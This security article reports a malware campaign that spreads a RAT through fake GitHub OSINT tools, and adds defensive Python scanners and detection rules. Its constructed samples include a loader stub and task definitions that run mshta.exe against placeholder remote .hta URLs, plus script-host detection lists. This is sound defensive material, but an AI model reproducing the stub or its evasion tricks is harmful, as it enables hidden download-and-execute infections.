A new campaign is turning the trust developers place in GitHub repositories into a weapon. Morphisec Threat Labs has uncovered PyStoreRAT, a previously undocumented Remote Access Trojan (RAT) that is delivered through seemingly innocent Python projects and runs as a fileless payload on victim machines.
Active since mid-2025, the campaign specifically targets developers and OSINT (Open Source Intelligence) practitioners by luring them with polished, but fraudulent, software tools.
The attack vector is deviously simple. Threat actors have flooded GitHub with repositories masquerading as useful utilities, such as “Spyder OSINT,” “HacxGPT,” or “VulnWatchDog.” These repos often feature AI-generated graphics and professional documentation to appear legitimate. The advertised functionality, however, does not exist.
The report describes them plainly: “These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via mshta.exe”.
Once a user runs the included Python script—believing they are launching a tool—a hidden subprocess triggers the infection chain. “The primary purpose was not to deliver legitimate functionality, but to… entice users to execute the included Python or JavaScript loader stub”.
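The practical question for a developer is how to spot such a stub before running it. Below is an added example, not code from the Morphisec report or from any of the repositories it names: a small static check that parses a Python file and flags process-spawning calls (subprocess, os.system and friends) that reference mshta.exe, a remote URL or an .hta file, plus the window-hiding flags a stub uses to stay quiet behind its decoy banner. The two sample scripts are constructed for the test and the URL is a non-routable placeholder, not an indicator from the report; extending the host list beyond mshta.exe to neighbouring Windows script hosts is an assumption on our part.

```python
"""Static triage of a Python file for the loader-stub pattern above: a short
script whose only real work is to hand a remote .hta URL to mshta.exe from a
process-spawning call. Added example; not code from the Morphisec report or
from the repositories it names. Both samples below are constructed for the
test, and the URL is a non-routable placeholder, not an indicator."""
import ast
import re

# mshta.exe is the host the report names. The others are an extension of the
# same pattern to neighbouring Windows script hosts (assumption, not from the page).
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "rundll32", "regsvr32")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)

# Call sites through which a Python script spawns another process.
SPAWN_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "os.system", "os.popen", "os.startfile", "os.execv", "os.spawnv",
}


def _dotted_name(node):
    """'subprocess.Popen' for an Attribute/Name chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _strings_in(node):
    """Every string literal underneath a node (args, lists, keywords...)."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def _indicators(strings):
    """Classify string literals into indicator tags."""
    tags = set()
    for s in strings:
        low = s.lower()
        if any(h in low for h in SCRIPT_HOSTS):
            tags.add("script-host")
        if URL_RE.search(s):
            tags.add("remote-url")
        if HTA_RE.search(s):
            tags.add("hta")
    return tags


def scan_calls(src):
    """One finding per spawn call that carries an indicator or hides its window.
    Returns [(lineno, callee, sorted_reason_tags)]."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        callee = _dotted_name(node.func)
        if callee not in SPAWN_CALLS:
            continue
        reasons = _indicators(_strings_in(node))
        # Heuristic: creationflags/startupinfo is how a stub keeps the child
        # window hidden so the user sees only the fake tool's console output.
        if any(kw.arg in ("creationflags", "startupinfo") for kw in node.keywords):
            reasons.add("hidden-window")
        if reasons:
            findings.append((node.lineno, callee, sorted(reasons)))
    return findings


def triage(src):
    """File-level verdict. Indicators are also collected across the whole file
    so a URL assigned to a variable and passed by name is still counted."""
    calls = scan_calls(src)
    file_tags = _indicators(_strings_in(ast.parse(src)))
    suspicious = bool(calls) and bool(file_tags & {"script-host", "hta"})
    return {"calls": calls, "indicators": sorted(file_tags), "suspicious": suspicious}


# Constructed stand-in for a loader stub of the kind the report describes.
SAMPLE_STUB = '''
import subprocess

print("[*] Spyder OSINT v2.1 - loading modules...")   # decoy banner

STAGE = "http://example.invalid/update.hta"   # placeholder, not a real indicator
subprocess.Popen(["mshta.exe", STAGE], creationflags=0x08000000)  # CREATE_NO_WINDOW
'''

# Constructed benign script that also spawns a process, to show no false positive.
BENIGN = '''
import subprocess
out = subprocess.run(["git", "status", "--porcelain"], capture_output=True, text=True)
print(out.stdout)
'''

if __name__ == "__main__":
    for name, src in (("SAMPLE_STUB", SAMPLE_STUB), ("BENIGN", BENIGN)):
        print(name, triage(src))
```

Run it over every `.py` and `.pyw` in a freshly cloned repo before executing anything; a hit on `script-host` or `hta` in a project that claims to be a pure OSINT tool is reason enough to stop. The AST walk deliberately does not execute the file, so the check is safe to run on untrusted code.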
The payload, PyStoreRAT, is built for evasion. It runs as a fileless JavaScript implant inside the Windows HTML Application (HTA) host, mshta.exe, so little is written to disk. Despite the small loader, the implant itself is full-featured.
“PyStoreRAT itself is a modular, multi-stage JS implant capable of executing a wide range of payload formats, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules”.
This modularity lets the operators choose the second stage per victim rather than hard-coding one payload. In recent attacks, Morphisec observed the RAT delivering the Rhadamanthys information stealer to harvest sensitive data.
One of the more notable features of PyStoreRAT is that it checks its environment. The malware enumerates running security products and carries hardcoded logic to change its behavior when specific ones are present.
The report notes that the malware “includes explicit evasion logic targeting CrowdStrike Falcon”. If the RAT detects processes related to CrowdStrike (such as csfalconservice) or other antivirus products like “ReasonLabs,” it alters its execution behavior, launching via a command wrapper so that mshta.exe is no longer a direct child of the loader. That breaks the parent-child chain that behavioral rules typically key on.
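The wrapper trick only works against detections that look at the direct parent. As an added example (not from the Morphisec report), the code below contrasts that naive rule with one that walks the process ancestry chain and also keys on mshta.exe's own command line. The telemetry is constructed in the shape of Sysmon Event ID 1 records; the GUIDs, paths and the use of `cmd.exe /c` as the wrapper are illustrative assumptions, since the report does not say which wrapper the implant uses.

```python
"""Ancestry-aware detection for the mshta.exe launch described above. Added
example, not from the Morphisec report. The events are constructed in the
shape of Sysmon Event ID 1 (process creation) records; the GUIDs, paths and
the choice of cmd.exe /c as the wrapper are illustrative assumptions. It
contrasts a rule that keys on mshta.exe's direct parent, which a wrapper
defeats, with one that walks the ParentProcessGuid chain and one that keys
on mshta.exe's own command line, which it does not."""
import re

INTERPRETERS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe"}
WRAPPERS = {"cmd.exe", "powershell.exe", "explorer.exe", "conhost.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event, by_guid, max_hops=8):
    """Parent, grandparent, ... up to max_hops, stopping where the chain
    is broken (parent not present in the telemetry)."""
    chain, cur = [], event
    for _ in range(max_hops):
        parent = by_guid.get(cur.get("ParentProcessGuid"))
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def naive_detect(events):
    """The rule a wrapper defeats: alert only when mshta.exe's direct parent
    is a script interpreter."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["Image"]) != "mshta.exe":
            continue
        parent = by_guid.get(e.get("ParentProcessGuid"))
        if parent is not None and basename(parent["Image"]) in INTERPRETERS:
            hits.append(e["ProcessGuid"])
    return hits


def detect(events):
    """Alert on mshta.exe with a remote target, or with an interpreter
    anywhere in its ancestry, and name the wrapper when one was inserted."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["Image"]) != "mshta.exe":
            continue
        reasons = []
        if URL_RE.search(e["CommandLine"]):
            reasons.append("mshta-remote-target")
        chain = [basename(p["Image"]) for p in ancestry(e, by_guid)]
        if any(p in INTERPRETERS for p in chain):
            reasons.append("interpreter-in-ancestry")
        if chain and chain[0] in WRAPPERS and any(p in INTERPRETERS for p in chain[1:]):
            reasons.append("wrapper-between-interpreter-and-mshta")
        if reasons:
            alerts.append({"ProcessGuid": e["ProcessGuid"], "chain": chain, "reasons": reasons})
    return alerts


PY = r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe"
SYS32 = r"C:\Windows\System32"

# Constructed telemetry: one direct launch, one launch through a cmd.exe wrapper,
# and one benign local HTA whose parent is not in the capture.
EVENTS = [
    {"ProcessGuid": "P1", "ParentProcessGuid": "P0", "Image": PY,
     "CommandLine": "python.exe spyder_osint.py"},
    {"ProcessGuid": "P2", "ParentProcessGuid": "P1", "Image": SYS32 + r"\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/a.hta"},
    {"ProcessGuid": "P3", "ParentProcessGuid": "P1", "Image": SYS32 + r"\cmd.exe",
     "CommandLine": "cmd.exe /c mshta.exe http://example.invalid/b.hta"},
    {"ProcessGuid": "P4", "ParentProcessGuid": "P3", "Image": SYS32 + r"\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/b.hta"},
    {"ProcessGuid": "P5", "ParentProcessGuid": "P9", "Image": SYS32 + r"\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\ExampleVendor\help.hta"'},
]

if __name__ == "__main__":
    print("naive:", naive_detect(EVENTS))
    for a in detect(EVENTS):
        print("alert:", a)
```

On the constructed data the naive rule sees only the direct launch (P2) and misses the wrapped one (P4); the ancestry walk catches both and labels the inserted cmd.exe, while the command-line check would fire even if the parent chain were unavailable. The local-file HTA (P5) produces no alert, which is the false-positive case a practitioner cares about.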
To ensure it remains on the infected system after a reboot, PyStoreRAT employs a classic masquerade. It creates a Windows Scheduled Task designed to look like a routine driver update.
“The task is disguised as ‘NVIDIA App SelfUpdate_[GUID]’ and is configured to run every 10 minutes or upon login,” ensuring the malware maintains a persistent foothold on the device.
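That combination, a vendor-sounding name, a ten-minute repetition and a logon trigger, is easy to triage from exported task definitions. The following is an added example, not from the Morphisec report: it parses Task Scheduler XML (the format `schtasks /Query /TN <name> /XML` prints, here without the XML declaration) and scores each task on the name pattern the report gives, the PT10M repetition plus logon trigger, and whether the action is a script host or a binary that does not belong to the vendor the name claims. The action shown (mshta.exe with a remote URL) is an assumption; the report states the task's name and schedule, not the command it runs. Both task definitions are constructed, and the benign control is not a real NVIDIA task.

```python
"""Triage of exported Task Scheduler XML for the persistence described above:
a task named like 'NVIDIA App SelfUpdate_{GUID}' that repeats every ten
minutes and also fires at logon. Added example, not from the Morphisec report.
The XML is constructed in the real Task Scheduler export format (minus the XML
declaration); the action (mshta.exe with a remote URL) is an assumption, since
the report gives the task's name and schedule, not the command it runs. The
vendor task is a constructed benign control, not a real NVIDIA task."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
GUID = r"\{?[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\}?"
NAME_RE = re.compile(r"NVIDIA App SelfUpdate_" + GUID, re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Script hosts a legitimate vendor self-updater would not normally be.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}


def _exe(command):
    """Lower-cased executable name from an <Exec><Command> value."""
    return command.strip().strip('"').rsplit("\\", 1)[-1].lower()


def triage_task(xml_text):
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS).strip()
    name = uri.rsplit("\\", 1)[-1]
    commands = [(c.text or "") for c in root.findall("t:Actions/t:Exec/t:Command", NS)]
    args = [(a.text or "") for a in root.findall("t:Actions/t:Exec/t:Arguments", NS)]
    intervals = [(i.text or "").strip() for i in root.findall(".//t:Repetition/t:Interval", NS)]
    logon = root.find("t:Triggers/t:LogonTrigger", NS) is not None

    reasons = []
    if NAME_RE.fullmatch(name):
        reasons.append("name-matches-reported-pattern")
    if {_exe(c) for c in commands} & SCRIPT_HOSTS:
        reasons.append("action-is-script-host")
    # A task that borrows a vendor's name should run that vendor's binary:
    # check that the first word of the task name appears in the action path.
    vendor = name.split()[0].lower() if name.split() else ""
    if vendor and not any(vendor in c.lower() for c in commands):
        reasons.append("vendor-name-absent-from-action-path")
    if "PT10M" in intervals and logon:   # ISO 8601 duration: ten minutes
        reasons.append("10-minute-repeat-plus-logon")
    if any(URL_RE.search(a) for a in args):
        reasons.append("remote-url-argument")
    return {"name": name, "commands": commands, "reasons": reasons,
            "suspicious": len(reasons) >= 2}


# Constructed task matching the reported name and schedule; action assumed.
SUSPECT_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\NVIDIA App SelfUpdate_{0b1c2d3e-4f50-4a6b-8c7d-9e0f1a2b3c4d}</URI>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-07-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>mshta.exe</Command>
      <Arguments>http://example.invalid/stage.hta</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign control: a daily updater whose binary lives under its own vendor path.
VENDOR_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleVendor App Update</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-07-01T03:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\ExampleVendor\Updater.exe"</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for xml_text in (SUSPECT_TASK, VENDOR_TASK):
        print(triage_task(xml_text))
```

The two-reason threshold is deliberate: a genuine vendor updater can legitimately run often or at logon, but a task that also names a vendor it does not launch, or whose action is a script host pointed at a URL, has no benign explanation. Feed it the XML for every task on a suspect host and review anything that scores.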
While attribution is ongoing, Morphisec analysts have found clues pointing East. “Russian-language artifacts and coding patterns point to a likely Eastern European origin,” the report states.
As developers continue to rely on open-source ecosystems, PyStoreRAT serves as a grim reminder to verify every line of code. The malware “represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” making it a potent threat in the modern landscape.